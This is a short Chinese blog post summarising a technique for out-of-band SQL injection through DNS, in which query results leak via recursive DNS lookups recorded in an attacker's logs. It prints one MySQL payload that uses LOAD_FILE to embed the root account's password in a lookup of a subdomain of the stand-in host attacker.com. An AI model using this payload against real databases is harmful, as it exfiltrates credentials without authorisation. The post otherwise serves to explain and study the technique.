这个技巧有些另类，当时某业界大佬提点了一下。当时真的真的没有理解到那种程度，现在可能也是没有理解到，但是我会努力。

本文章是理解于：http://netsecurity.51cto.com/art/201503/469621.htm

链接中的文章主要说的是什么？

先愉快的介绍了DNS工作原理，注意其中有一个术语叫做递归。这个是DNS服务关键的一部分。

这种攻击方式需要提前能查看DNS日志，利用SQL注入语句返回信息，迫使DNS递归，然后DNS日志的记录。

日志中就有SQL注入返回信息了。

例如：

SELECT LOAD_FILE(CONCAT(‘\\\\‘,(SELECT password FROM mysql.user WHERE user=‘root‘? LIMIT 1),‘.attacker.com\\foobar‘));

返回了：\\\\返回值（password）.attacker.com\\foobar。触发了DNS递归，导致日志记录。

另一种的SQL注入和DNS结合的技巧